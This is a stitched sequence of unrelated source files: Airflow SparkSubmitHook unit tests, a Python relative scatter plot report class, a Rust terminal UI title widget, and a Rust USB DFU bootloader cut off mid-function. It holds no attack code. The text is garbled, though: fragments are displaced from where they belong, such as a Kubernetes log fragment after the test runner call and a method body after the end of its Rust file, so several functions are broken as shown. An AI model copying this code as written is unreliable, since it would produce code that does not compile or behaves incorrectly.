mock_popen.return_value.wait.return_value = 0 # When hook = SparkSubmitHook(conn_id='') hook.submit() # Then self.assertEqual(mock_popen.mock_calls[0], call(['spark-submit', '--master', 'yarn', '--name', 'default-name', ''], stderr=-2, stdout=-1, universal_newlines=True, bufsize=-1)) def test_resolve_should_track_driver_status(self): # Given hook_default = SparkSubmitHook(conn_id='') hook_spark_yarn_cluster = SparkSubmitHook(conn_id='spark_yarn_cluster') hook_spark_k8s_cluster = SparkSubmitHook(conn_id='spark_k8s_cluster') hook_spark_default_mesos = SparkSubmitHook(conn_id='spark_default_mesos') hook_spark_home_set = SparkSubmitHook(conn_id='spark_home_set') hook_spark_home_not_set = SparkSubmitHook(conn_id='spark_home_not_set') hook_spark_binary_set = SparkSubmitHook(conn_id='spark_binary_set') hook_spark_binary_and_home_set = SparkSubmitHook( conn_id='spark_binary_and_home_set') hook_spark_standalone_cluster = SparkSubmitHook( conn_id='spark_standalone_cluster') # When should_track_driver_status_default = hook_default \ ._resolve_should_track_driver_status() should_track_driver_status_spark_yarn_cluster = hook_spark_yarn_cluster \ ._resolve_should_track_driver_status() should_track_driver_status_spark_k8s_cluster = hook_spark_k8s_cluster \ ._resolve_should_track_driver_status() should_track_driver_status_spark_default_mesos = hook_spark_default_mesos \ ._resolve_should_track_driver_status() should_track_driver_status_spark_home_set = hook_spark_home_set \ ._resolve_should_track_driver_status() should_track_driver_status_spark_home_not_set = hook_spark_home_not_set \ ._resolve_should_track_driver_status() should_track_driver_status_spark_binary_set = hook_spark_binary_set \ ._resolve_should_track_driver_status() should_track_driver_status_spark_binary_and_home_set = \ hook_spark_binary_and_home_set._resolve_should_track_driver_status() should_track_driver_status_spark_standalone_cluster = \ hook_spark_standalone_cluster._resolve_should_track_driver_status() # Then self.assertEqual(should_track_driver_status_default, False) self.assertEqual(should_track_driver_status_spark_yarn_cluster, False) self.assertEqual(should_track_driver_status_spark_k8s_cluster, False) self.assertEqual(should_track_driver_status_spark_default_mesos, False) 
self.assertEqual(should_track_driver_status_spark_home_set, False) self.assertEqual(should_track_driver_status_spark_home_not_set, False) self.assertEqual(should_track_driver_status_spark_binary_set, False) self.assertEqual(should_track_driver_status_spark_binary_and_home_set, False) self.assertEqual(should_track_driver_status_spark_standalone_cluster, True) def test_resolve_connection_yarn_default(self): # Given hook = SparkSubmitHook(conn_id='') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "yarn", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "yarn") def test_resolve_connection_yarn_default_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_default') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "yarn", "spark_binary": "spark-submit", "deploy_mode": None, "queue": "root.default", "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "yarn") self.assertEqual(dict_cmd["--queue"], "root.default") def test_resolve_connection_mesos_default_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_default_mesos') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "mesos://host:5050", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "mesos://host:5050") def test_resolve_connection_spark_yarn_cluster_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_yarn_cluster') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "yarn://yarn-master", "spark_binary": "spark-submit", "deploy_mode": "cluster", "queue": "root.etl", "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "yarn://yarn-master") self.assertEqual(dict_cmd["--queue"], "root.etl") self.assertEqual(dict_cmd["--deploy-mode"], "cluster") def test_resolve_connection_spark_k8s_cluster_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_k8s_cluster') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"spark_home": "/opt/spark", "queue": None, "spark_binary": "spark-submit", "master": "k8s://https://k8s-master", "deploy_mode": "cluster", "namespace": "mynamespace"} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "k8s://https://k8s-master") self.assertEqual(dict_cmd["--deploy-mode"], "cluster") def test_resolve_connection_spark_home_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_home_set') # When connection = hook._resolve_connection() cmd = 
hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn://yarn-master", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": "/opt/myspark", "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], '/opt/myspark/bin/spark-submit') def test_resolve_connection_spark_home_not_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_home_not_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn://yarn-master", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'spark-submit') def test_resolve_connection_spark_binary_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_binary_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "custom-spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'custom-spark-submit') def test_resolve_connection_spark_binary_default_value_override(self): # Given hook = SparkSubmitHook(conn_id='spark_binary_set', spark_binary='another-custom-spark-submit') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "another-custom-spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'another-custom-spark-submit') def test_resolve_connection_spark_binary_default_value(self): # Given hook = SparkSubmitHook(conn_id='spark_default') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "spark-submit", "deploy_mode": None, "queue": 'root.default', "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'spark-submit') def test_resolve_connection_spark_binary_and_home_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_binary_and_home_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "custom-spark-submit", "deploy_mode": None, "queue": None, "spark_home": "/path/to/spark_home", "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], '/path/to/spark_home/bin/custom-spark-submit') def test_resolve_connection_spark_standalone_cluster_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "spark://spark-standalone-master:6066", "spark_binary": "spark-submit", "deploy_mode": "cluster", "queue": None, "spark_home": "/path/to/spark_home", "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 
'/path/to/spark_home/bin/spark-submit') def test_resolve_spark_submit_env_vars_standalone_client_mode(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster_client_mode', env_vars={"bar": "foo"}) # When hook._build_spark_submit_command(self._spark_job_file) # Then self.assertEqual(hook._env, {"bar": "foo"}) def test_resolve_spark_submit_env_vars_standalone_cluster_mode(self): def env_vars_exception_in_standalone_cluster_mode(): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster', env_vars={"bar": "foo"}) # When hook._build_spark_submit_command(self._spark_job_file) # Then self.assertRaises(AirflowException, env_vars_exception_in_standalone_cluster_mode) def test_resolve_spark_submit_env_vars_yarn(self): # Given hook = SparkSubmitHook(conn_id='spark_yarn_cluster', env_vars={"bar": "foo"}) # When cmd = hook._build_spark_submit_command(self._spark_job_file) # Then self.assertEqual(cmd[4], "spark.yarn.appMasterEnv.bar=foo") self.assertEqual(hook._env, {"bar": "foo"}) def test_resolve_spark_submit_env_vars_k8s(self): # Given hook = SparkSubmitHook(conn_id='spark_k8s_cluster', env_vars={"bar": "foo"}) # When cmd = hook._build_spark_submit_command(self._spark_job_file) # Then self.assertEqual(cmd[4], "spark.kubernetes.driverEnv.bar=foo") def test_process_spark_submit_log_yarn(self): # Given hook = SparkSubmitHook(conn_id='spark_yarn_cluster') log_lines = [ 'SPARK_MAJOR_VERSION is set to 2, using Spark2', 'WARN NativeCodeLoader: Unable to load native-hadoop library for your ' + 'platform... using builtin-java classes where applicable', 'WARN DomainSocketFactory: The short-circuit local reads feature cannot ' 'be used because libhadoop cannot be loaded.', 'INFO Client: Requesting a new application from cluster with 10 NodeManagers', 'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager' ] # When hook._process_spark_submit_log(log_lines) # Then self.assertEqual(hook._yarn_application_id, 'application_1486558679801_1820') def test_process_spark_submit_log_k8s(self): # Given hook = SparkSubmitHook(conn_id='spark_k8s_cluster') log_lines = [ 'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,' + 'spark-role -> driver' + 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42' + 'creation time: 2018-03-05T10:26:55Z' + 'service account name: spark' + 'volumes: spark-init-properties, download-jars-volume,' + 'download-files-volume, spark-token-2vmlm' + 'node name: N/A' + 'start time: N/A' + 'container images: N/A' + 'phase: Pending' + 'status: []' + '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,' + ' new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'Exit code: 999' ] # When hook._process_spark_submit_log(log_lines) # Then self.assertEqual(hook._kubernetes_driver_pod, 'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver') self.assertEqual(hook._spark_exit_code, 999) def test_process_spark_submit_log_standalone_cluster(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster') log_lines = [ 'Running Spark using the REST application submission protocol.', '17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request ' 'to launch an application in spark://spark-standalone-master:6066', '17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully ' + 'created as 
driver-20171128111415-0001. Polling submission state...' ] # When hook._process_spark_submit_log(log_lines) # Then self.assertEqual(hook._driver_id, 'driver-20171128111415-0001') def test_process_spark_driver_status_log(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster') log_lines = [ 'Submitting a request for the status of submission ' + 'driver-20171128111415-0001 in spark://spark-standalone-master:6066', '17/11/28 11:15:37 INFO RestSubmissionClient: Server responded with ' + 'SubmissionStatusResponse:', '{', '"action" : "SubmissionStatusResponse",', '"driverState" : "RUNNING",', '"serverSparkVersion" : "1.6.0",', '"submissionId" : "driver-20171128111415-0001",', '"success" : true,', '"workerHostPort" : "172.18.0.7:38561",', '"workerId" : "worker-20171128110741-172.18.0.7-38561"', '}' ] # When hook._process_spark_status_log(log_lines) # Then self.assertEqual(hook._driver_status, 'RUNNING') @patch('airflow.contrib.hooks.spark_submit_hook.subprocess.Popen') def test_yarn_process_on_kill(self, mock_popen): # Given mock_popen.return_value.stdout = io.StringIO('stdout') mock_popen.return_value.stderr = io.StringIO('stderr') mock_popen.return_value.poll.return_value = None mock_popen.return_value.wait.return_value = 0 log_lines = [ 'SPARK_MAJOR_VERSION is set to 2, using Spark2', 'WARN NativeCodeLoader: Unable to load native-hadoop library for your ' + 'platform... using builtin-java classes where applicable', 'WARN DomainSocketFactory: The short-circuit local reads feature cannot ' + 'be used because libhadoop cannot be loaded.', 'INFO Client: Requesting a new application from cluster with 10 ' + 'NodeManagerapplication_1486558679801_1820s', 'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager' ] hook = SparkSubmitHook(conn_id='spark_yarn_cluster') hook._process_spark_submit_log(log_lines) hook.submit() # When hook.on_kill() # Then self.assertIn(call(['yarn', 'application', '-kill', 'application_1486558679801_1820'], stderr=-1, stdout=-1), mock_popen.mock_calls) def test_standalone_cluster_process_on_kill(self): # Given log_lines = [ 'Running Spark using the REST application submission protocol.', '17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request ' + 'to launch an application in spark://spark-standalone-master:6066', '17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully ' + 'created as driver-20171128111415-0001. Polling submission state...' 
] hook = SparkSubmitHook(conn_id='spark_standalone_cluster') hook._process_spark_submit_log(log_lines) # When kill_cmd = hook._build_spark_driver_kill_command() # Then self.assertEqual(kill_cmd[0], '/path/to/spark_home/bin/spark-submit') self.assertEqual(kill_cmd[1], '--master') self.assertEqual(kill_cmd[2], 'spark://spark-standalone-master:6066') self.assertEqual(kill_cmd[3], '--kill') self.assertEqual(kill_cmd[4], 'driver-20171128111415-0001') @patch('airflow.kubernetes.kube_client.get_kube_client') @patch('airflow.contrib.hooks.spark_submit_hook.subprocess.Popen') def test_k8s_process_on_kill(self, mock_popen, mock_client_method): # Given mock_popen.return_value.stdout = io.StringIO('stdout') mock_popen.return_value.stderr = io.StringIO('stderr') mock_popen.return_value.poll.return_value = None mock_popen.return_value.wait.return_value = 0 client = mock_client_method.return_value hook = SparkSubmitHook(conn_id='spark_k8s_cluster') log_lines = [ 'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,' + 'spark-role -> driver' + 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42' + 'creation time: 2018-03-05T10:26:55Z' + 'service account name: spark' +
'container images: N/A' + 'phase: Pending' + 'status: []' + '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,' + ' new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'Exit code: 0' ] hook._process_spark_submit_log(log_lines) hook.submit() # When hook.on_kill() # Then import kubernetes kwargs = {'pretty': True, 'body': kubernetes.client.V1DeleteOptions()} client.delete_namespaced_pod.assert_called_once_with( 'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver', 'mynamespace', **kwargs) if __name__ == '__main__': unittest.main()
'volumes: spark-init-properties, download-jars-volume,' + 'download-files-volume, spark-token-2vmlm' + 'node name: N/A' + 'start time: N/A' +
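The tests above resolve named connections such as 'spark_yarn_cluster' and 'spark_standalone_cluster'. Below is a minimal sketch of how those connections are typically registered before the tests run; the merge_conn helper and the extra keys ("spark-home", "deploy-mode", "queue") are assumptions based on what _resolve_connection() appears to read, not part of the excerpt above.

# Sketch only: registering the spark connections the tests above resolve.
# Assumes Airflow 1.10-era imports (airflow.models.Connection, airflow.utils.db.merge_conn)
# and that SparkSubmitHook reads "spark-home"/"deploy-mode"/"queue" from the connection's extra JSON.
from airflow import models
from airflow.utils import db

db.merge_conn(models.Connection(
    conn_id='spark_yarn_cluster', conn_type='spark',
    host='yarn://yarn-master',
    extra='{"queue": "root.etl", "deploy-mode": "cluster"}'))

db.merge_conn(models.Connection(
    conn_id='spark_standalone_cluster', conn_type='spark',
    host='spark://spark-standalone-master:6066',
    extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "cluster"}'))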
relativescatter.py
# -*- coding: utf-8 -*- from collections import defaultdict from matplotlib import ticker from downward.reports.scatter import ScatterPlotReport from downward.reports.plot import PlotReport, Matplotlib, MatplotlibPlot # TODO: handle outliers # TODO: this is mostly copied from ScatterMatplotlib (scatter.py) class RelativeScatterMatplotlib(Matplotlib): @classmethod def _plot(cls, report, axes, categories, styles): # Display grid axes.grid(b=True, linestyle='-', color='0.75') has_points = False # Generate the scatter plots for category, coords in sorted(categories.items()): X, Y = zip(*coords) axes.scatter(X, Y, s=42, label=category, **styles[category]) if X and Y: has_points = True if report.xscale == 'linear' or report.yscale == 'linear': plot_size = report.missing_val * 1.01 else: plot_size = report.missing_val * 1.25 # make 5 ticks above and below 1 yticks = [] tick_step = report.ylim_top**(1/5.0) for i in xrange(-5, 6): yticks.append(tick_step**i) axes.set_yticks(yticks) axes.get_yaxis().set_major_formatter(ticker.ScalarFormatter()) axes.set_xlim(report.xlim_left or -1, report.xlim_right or plot_size) axes.set_ylim(report.ylim_bottom or -1, report.ylim_top or plot_size) for axis in [axes.xaxis, axes.yaxis]: MatplotlibPlot.change_axis_formatter( axis, report.missing_val if report.show_missing else None) return has_points class RelativeScatterPlotReport(ScatterPlotReport):
""" Generate a scatter plot that shows a relative comparison of two algorithms with regard to the given attribute. The attribute value of algorithm 1 is shown on the x-axis and the relation to the value of algorithm 2 on the y-axis. """ def __init__(self, show_missing=True, get_category=None, **kwargs): ScatterPlotReport.__init__(self, show_missing, get_category, **kwargs) if self.output_format == 'tex': raise "not supported" else: self.writer = RelativeScatterMatplotlib def _fill_categories(self, runs): # We discard the *runs* parameter. # Map category names to value tuples categories = defaultdict(list) self.ylim_bottom = 2 self.ylim_top = 0.5 self.xlim_left = float("inf") for (domain, problem), runs in self.problem_runs.items(): if len(runs) != 2: continue run1, run2 = runs assert (run1['algorithm'] == self.algorithms[0] and run2['algorithm'] == self.algorithms[1]) val1 = run1.get(self.attribute) val2 = run2.get(self.attribute) if val1 is None or val2 is None: continue category = self.get_category(run1, run2) assert val1 > 0, (domain, problem, self.algorithms[0], val1) assert val2 > 0, (domain, problem, self.algorithms[1], val2) x = val1 y = val2 / float(val1) categories[category].append((x, y)) self.ylim_top = max(self.ylim_top, y) self.ylim_bottom = min(self.ylim_bottom, y) self.xlim_left = min(self.xlim_left, x) # center around 1 if self.ylim_bottom < 1: self.ylim_top = max(self.ylim_top, 1 / float(self.ylim_bottom)) if self.ylim_top > 1: self.ylim_bottom = min(self.ylim_bottom, 1 / float(self.ylim_top)) return categories def _set_scales(self, xscale, yscale): # ScatterPlot uses log-scaling on the x-axis by default. PlotReport._set_scales( self, xscale or self.attribute.scale or 'log', 'log')
title_line.rs
use ::std::path::PathBuf; use ::tui::buffer::Buffer; use ::tui::layout::Rect; use ::tui::style::{Color, Modifier, Style}; use ::tui::widgets::Widget; use crate::ui::format::DisplaySize; use crate::ui::title::{CellSizeOpt, TitleTelescope}; use crate::ui::FolderInfo; #[cfg(not(target_os = "windows"))] use crate::os::unix::is_user_admin; #[cfg(target_os = "windows")] use crate::os::windows::is_user_admin; pub struct TitleLine<'a> { base_path_info: FolderInfo<'a>, current_path_info: FolderInfo<'a>, space_freed: u128, show_loading: bool, progress_indicator: u64, read_errors: Option<u64>, flash_space: bool, path_error: bool, zoom_level: Option<usize>, } impl<'a> TitleLine<'a> { pub fn new( base_path_info: FolderInfo<'a>, current_path_info: FolderInfo<'a>, space_freed: u128, ) -> Self { Self { base_path_info, current_path_info, space_freed, progress_indicator: 0, read_errors: None, show_loading: false, flash_space: false, path_error: false, zoom_level: None, } } pub fn show_loading(mut self) -> Self { self.show_loading = true; self } pub fn flash_space(mut self, flash_space: bool) -> Self { self.flash_space = flash_space; self } pub fn path_error(mut self, path_error: bool) -> Self { self.path_error = path_error; self } pub fn progress_indicator(mut self, progress_indicator: u64) -> Self { self.progress_indicator = progress_indicator; self } pub fn read_errors(mut self, read_errors: u64) -> Self
pub fn zoom_level(mut self, zoom_level: usize) -> Self { if zoom_level > 0 { self.zoom_level = Some(zoom_level); } self } } impl<'a> Widget for TitleLine<'a> { fn render(self, rect: Rect, buf: &mut Buffer) { let base_path = &self .base_path_info .path .clone() .into_os_string() .into_string() .expect("could not convert os string to string"); let current_path = { let mut current_path_relative_to_base = PathBuf::new(); let base_path_len = self.base_path_info.path.iter().count(); for folder in self.current_path_info.path.iter().skip(base_path_len) { current_path_relative_to_base.push(folder); } current_path_relative_to_base.to_string_lossy().into_owned() }; let separator = if base_path.ends_with(::std::path::MAIN_SEPARATOR) { // eg. if base_path is "/", we don't want current path to // also start with "/" otherwise we'll have "//path_to_my/location" // instead of "/path_to_my/location" format!("") } else { format!("{}", ::std::path::MAIN_SEPARATOR) }; #[cfg(test)] let current_path = str::replace(&current_path, "\\", "/"); #[cfg(test)] let base_path = str::replace(&base_path, "\\", "/"); #[cfg(test)] let separator = str::replace(&separator, "\\", "/"); let total_size = DisplaySize(self.base_path_info.size as f64); let total_descendants = &self.base_path_info.num_descendants; let current_folder_size = DisplaySize(self.current_path_info.size as f64); let current_folder_descendants = self.current_path_info.num_descendants; let space_freed = DisplaySize(self.space_freed as f64); let mut default_style = Style::default().fg(Color::Yellow); if !self.show_loading { default_style = default_style.add_modifier(Modifier::BOLD); }; let mut title_telescope = TitleTelescope::new(default_style); if self.show_loading { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!( "Scanning: {} ({} files)", total_size, total_descendants )), CellSizeOpt::new(format!("Scanning: {}", total_size)), CellSizeOpt::new(format!("{}", total_size)), ]); } else { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!( "Total: {} ({} files), freed: {}", total_size, total_descendants, space_freed )), CellSizeOpt::new(format!("Total: {}, freed: {}", total_size, space_freed)), CellSizeOpt::new(format!("Total: {}", total_size)), CellSizeOpt::new(format!("{}", total_size)), ]); }; if let Some(read_errors) = self.read_errors { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!(" (failed to read {} files)", read_errors)) .style(default_style.fg(Color::Red)), CellSizeOpt::new(format!(" ({} errors)", read_errors)) .style(default_style.fg(Color::Red)), CellSizeOpt::new(" (errors)".to_string()).style(default_style.fg(Color::Red)), ]); } if is_user_admin() { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!(" (CAUTION: running as root)")) .style(default_style.fg(Color::Red)), CellSizeOpt::new(format!(" (running as root)")).style(default_style.fg(Color::Red)), CellSizeOpt::new(" (root)".to_string()).style(default_style.fg(Color::Red)), ]); } title_telescope.append_to_right_side(vec![CellSizeOpt::new(base_path.to_string())]); if !current_path.is_empty() { title_telescope.append_to_right_side(vec![ CellSizeOpt::new(format!( "{}{} ({}, {} files)", separator, current_path, current_folder_size, current_folder_descendants )) .style(default_style.fg(Color::Green)), CellSizeOpt::new(format!( "{}{} ({})", separator, current_path, current_folder_size )) .style(default_style.fg(Color::Green)), CellSizeOpt::new(format!("{}{}", separator, current_path)) .style(default_style.fg(Color::Green)), ]); } 
if let Some(zoom_level) = self.zoom_level { title_telescope.append_to_right_side(vec![ CellSizeOpt::new(format!( " (+{} larger file(s), zoom out to show)", zoom_level )) .style(default_style.fg(Color::Green)), CellSizeOpt::new(format!(" (+{} larger file(s))", zoom_level)) .style(default_style.fg(Color::Green)), ]); } title_telescope .loading(self.show_loading, self.progress_indicator) .path_error(self.path_error) .size_flash(self.flash_space) .render(rect, buf); } }
{ if read_errors > 0 { self.read_errors = Some(read_errors); } self }
dfu.rs
use usb_device::{ class_prelude::*, Result, }; use core::mem; use crate::flash; use crate::flags; use crate::config; use crate::util; use crate::util::LOGGER; use stm32f1xx_hal::{ pac::{FLASH, USART1}, serial::Tx, }; use core::marker::PhantomData; #[allow(dead_code)] pub(crate) const BL_MAGIC: u32 = 0xdeadcafe; // const DFU_AL0: &'static str = "DFU Bootloader 0.2.0"; const CLASS_APPLICATION_SPECIFIC: u8 = 0xfe; const SUBCLASS_DFU: u8 = 0x01; const PROTOCOL_DFU_MODE: u8 = 0x02; const DESC_DFU_FUNCTIONAL: u8 = 0x21; #[allow(unused)] pub(crate) mod dfu_request { pub const DFU_DETACH: u8 = 0; // proto 1 pub const DFU_DNLOAD: u8 = 1; // proto 2 pub const DFU_UPLOAD: u8 = 2; // proto 2 pub const DFU_GETSTATUS: u8 = 3; // proto 1/2 pub const DFU_CLRSTATUS: u8 = 4; // proto 2 pub const DFU_GETSTATE: u8 = 5; // proto 1/2 pub const DFU_ABORT: u8 = 6; // proto 2 } #[allow(unused)] #[derive(Copy, Clone)] pub(crate) enum DfuState { AppIdle, AppDetach, DfuIdle, DfuDnloadSync, DfuDnloadBusy, DfuDnloadIdle, DfuManifestSync, DfuManifest, DfuManifestWaitReset, DfuUploadIdle, DfuError, } // todo: make all these useful #[allow(unused)] #[derive(Copy, Clone)] pub(crate) enum DfuDeviceStatus { Ok, // No error condition is present. ErrTarget, // File is not targeted for use by this device. ErrFile, // File is for this device but fails some vendor-specific verification test. ErrWrite, // Device is unable to write memory. ErrErase, // Memory erase function failed. ErrCheckErased, // Memory erase check failed ErrProg, // Program memory function failed. ErrVerify, // Programmed memory failed verification. ErrAddress, // Cannot program memory due to received address that is out of range. ErrNotDone, // Received DFU_DNLOAD with wLength = 0, but device does not think it has all of the data yet. ErrFirmware, // Device’s firmware is corrupt. It cannot return to run-time (non-DFU) operations. ErrVendor, // iString indicates a vendor-specific error. ErrUsbR, // Device detected unexpected USB reset signaling. ErrPoR, // Device detected unexpected power on reset. ErrUnknown, // Something went wrong, but the device does not know what it was. ErrStaledPkt, // Device stalled an unexpected request. 
} const BIGGEST_PAGE: usize = 2048; pub struct Dfu<'a, B: UsbBus> { woosh: PhantomData<B>, comm_if: InterfaceNumber, def_str: StringIndex, upload_capable: bool, download_capable: bool, state: DfuState, status: DfuDeviceStatus, firmware_size: usize, awaits_flash: bool, flashing: bool, manifesting: bool, page_buffer: [u8; BIGGEST_PAGE], page_buffer_index: usize, flags: core::option::Option<&'a flags::BlFlags>, } impl<B: UsbBus> Dfu<'_, B> { pub fn new(alloc: &UsbBusAllocator<B>, download_capable: bool, tx: Option<Tx<USART1>>) -> Dfu<'_, B> { unsafe { LOGGER = tx } let flags = flags::read_bl_flags(); Dfu { woosh: PhantomData, comm_if: alloc.interface(), def_str: alloc.string(), upload_capable: false, download_capable: download_capable, state: DfuState::DfuIdle, status: DfuDeviceStatus::Ok, firmware_size: 0, awaits_flash: false, flashing: false, manifesting: false, page_buffer: unsafe { mem::zeroed() }, page_buffer_index: 0, flags: flags, } } pub fn flags(&self) -> core::option::Option<&'_ flags::BlFlags> { self.flags } pub fn process_flash(&mut self) { if self.awaits_flash && !self.flashing { self.flashing = true; cortex_m::interrupt::free(|_| { unsafe { let mut addr: u32 = flash::PAGE_START + self.firmware_size as u32; flash::erase_page(addr); let n: usize = (self.page_buffer_index) / 4; for i in 0..n { let d: u32 = u32::from_le_bytes( [self.page_buffer[i*4], self.page_buffer[(i*4)+1], self.page_buffer[(i*4)+2], self.page_buffer[(i*4)+3]]); match flash::write_word(addr, d) { Ok(_) => { self.status = DfuDeviceStatus::Ok; addr += 4; }, Err(_) => { util::_log_fmt(format_args!("Write failed on i: {} addr: 0x{:x} sr: 0x{:x}\r\n", i, addr, &(*(FLASH::ptr())).sr.read().bits())); self.status = DfuDeviceStatus::ErrWrite; self.page_buffer_index = 0; self.awaits_flash = false; self.flashing = false; return; }, } } self.firmware_size += self.page_buffer_index; self.page_buffer_index = 0; } }); self.awaits_flash = false; self.flashing = false; } else if self.manifesting && !self.flashing { self.flashing = true; let flash_count: u32 = match self.flags() { Some(flags) => flags.flash_count+1, None => 1, }; let flags = &flags::BlFlags { magic: BL_MAGIC, flash_count: flash_count, user_code_legit: true, user_code_present: true, user_code_length: self.firmware_size as u32, }; flags::write_bl_flags(flags); self.flags = flags::read_bl_flags(); unsafe { flash::lock_flash(); } self.manifesting = false; self.flashing = false; } } } impl<B:UsbBus> UsbClass<B> for Dfu<'_, B> { fn get_bos_descriptors(&self, w: &mut BosWriter) -> Result<()> { w.capability(0x05, &[ 0x0, 0xDF, 0x60, 0xDD, 0xD8, // MS OS 2.0 Platform Capability ID 0x89, 0x45, 0xC7, 0x4C, 0x9C, 0xD2, 0x65, 0x9D, 0x9E, 0x64, 0x8A, 0x9F, 0x0, 0x0, 0x03, 0x06, // Windows Version 0xB2, 0x00, 0x21, 0x00 ]) } fn get_configuration_descriptors(&self, writer: &mut DescriptorWriter) -> Result<()> { writer.interface_alt(self.comm_if, 0, CLASS_APPLICATION_SPECIFIC, SUBCLASS_DFU, PROTOCOL_DFU_MODE, Some(self.def_str))?; writer.write(DESC_DFU_FUNCTIONAL, &[ 0x4 // manifestation tolerant | if self.upload_capable { 0x02 } else { 0x00 } | if self.download_capable { 0x01 } else { 0x00 }, //bmAttributes 255, 0, // wDetachTimeout //(page_size & 0xff) as u8, //((page_size >> 8) & 0xff) as u8, // wTransferSize 0x00, 0x01, // 256 bytes max 0x10, 0x01, // bcdDFUVersion ])?; Ok(()) } fn get_string(&self, index: StringIndex, _lang_id: u16) -> Option<&str> { if index == self.def_str { Some(config::DFU_AL0) } else { None } } fn control_in(&mut self, xfer: ControlIn<B>) { let req = 
